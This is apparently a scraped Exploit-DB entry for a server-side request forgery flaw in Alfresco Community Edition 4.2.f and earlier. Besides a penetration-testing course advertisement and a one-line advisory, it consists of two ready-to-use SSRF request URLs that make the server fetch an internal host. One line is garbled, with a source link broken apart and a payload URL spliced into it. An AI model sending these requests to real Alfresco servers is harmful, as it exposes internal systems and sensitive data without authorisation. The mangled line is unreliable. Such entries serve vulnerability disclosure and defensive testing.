Alfresco - '/cmisbrowser?url' Server-Side Request Forgery

EDB-ID:

39259




Platform:

Multiple

Date:

2014-07-16


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/68/info

http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
 
Alfresco Community Edition is prone to multiple security vulnerabilities.
 
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
 
Alfresco Community Edition 4.2.f and earlier are vulnerable. 

http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port